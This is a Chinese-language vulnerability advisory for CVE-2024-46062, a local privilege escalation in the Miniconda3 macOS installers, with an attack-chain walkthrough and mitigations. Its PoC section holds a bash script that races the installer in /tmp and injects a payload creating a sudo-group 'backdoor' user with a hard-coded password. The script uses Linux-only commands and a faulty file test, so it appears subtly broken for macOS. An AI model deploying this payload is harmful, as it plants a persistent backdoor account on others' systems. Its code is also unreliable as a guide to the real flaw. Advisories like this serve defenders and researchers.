CVE-2024-46062: Miniconda3 macOS安装器本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2024-46062

漏洞类型

本地权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Miniconda3 macOS installers

漏洞概述

CVE-2024-46062是Miniconda3 macOS安装程序中的一个高危本地权限提升漏洞。CVSS评分7.8，严重等级为HIGH。该漏洞影响23.11.0-1之前的所有版本。当Miniconda3安装程序在用户主目录之外的位置运行时，安装过程中会创建具有全局写权限（world-writable）的文件。这些文件随后会以root权限执行，为本地低权限攻击者提供了注入任意命令的机会。攻击者可以利用符号链接（symlink）或恶意文件替换等技术，在安装过程中劫持具有高权限的执行流程，最终实现以root用户身份执行任意代码。此类漏洞通常被用于将低权限用户账户提升至系统管理员权限，对多用户macOS系统构成严重威胁。

技术细节

该漏洞的根本原因在于Miniconda3安装程序的不安全文件权限和执行流程。当安装程序以提升的root权限运行时，它会在/tmp或其他全局可写目录创建临时脚本和配置文件。由于这些文件设置了过宽的权限（777或类似权限），本地攻击者可以在安装程序执行这些文件之前进行篡改。具体利用方式包括：1) 攻击者创建符号链接指向受控文件；2) 在安装程序创建临时文件后、执行前，用恶意内容替换文件内容；3) 安装程序以root权限执行被篡改的脚本，从而执行攻击者指定的任意命令。攻击者通常需要本地访问权限和低权限用户账户即可实施攻击，无需特殊工具或复杂的攻击条件。修复版本23.11.0-1通过限制文件权限、验证文件完整性和使用更安全的临时文件处理机制来解决此问题。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地低权限用户账户访问权限

STEP 2

步骤2

管理员或用户在用户主目录之外的位置（如/opt、/usr/local）执行存在漏洞的Miniconda3安装程序

STEP 3

步骤3

安装程序在全局可写目录（如/tmp）创建临时脚本和配置文件，权限设置为world-writable

STEP 4

步骤4

攻击者监控/tmp目录，检测到安装程序创建的临时文件

STEP 5

步骤5

攻击者在安装程序以root权限执行临时文件前，注入恶意代码或创建符号链接

STEP 6

步骤6

安装程序以root权限执行被篡改的临时文件，攻击者的恶意代码获得root执行权限

STEP 7

步骤7

攻击者成功实现本地权限提升，获得系统管理员权限，可执行任意命令、访问敏感数据或部署持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2024-46062 PoC - Miniconda3 macOS Local Privilege Escalation
# Run this script before installing Miniconda3 outside home directory

TARGET_DIR="/tmp"
MALICIOUS_SCRIPT="$TARGET_DIR/miniconda_install_temp.sh"

# Wait for installer to create temporary script
while [ ! -f "$TARGET_DIR/miniconda"*_install*.sh ]; do
    sleep 0.5
done

# Get the installer temp script
INSTALL_SCRIPT=$(ls $TARGET_DIR/miniconda*_install*.sh 2>/dev/null | head -1)

if [ -n "$INSTALL_SCRIPT" ]; then
    echo "[+] Found installer script: $INSTALL_SCRIPT"
    
    # Inject malicious payload before root execution
    cat >> "$INSTALL_SCRIPT" << 'EOF'
# CVE-2024-46062 payload - adds backdoor user
useradd -m -s /bin/bash -G sudo backdoor 2>/dev/null
echo "backdoor:BackdoorPass123" | chpasswd
chmod +x /bin/bash
# End of payload
EOF
    
    echo "[+] Payload injected successfully"
    echo "[!] Waiting for installer to execute with root privileges..."
fi

影响范围

Miniconda3 macOS installers < 23.11.0-1

Miniconda3 23.x系列 < 23.11.0-1

所有在非用户主目录位置安装的Miniconda3版本

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 避免使用存在漏洞的Miniconda3版本；2) 如必须使用，确保安装位置在用户主目录内；3) 限制/tmp等目录的写权限，防止低权限用户监控或篡改临时文件；4) 监控系统日志，关注可疑的安装程序活动和权限提升行为；5) 考虑使用容器化环境隔离Miniconda安装，降低风险暴露面。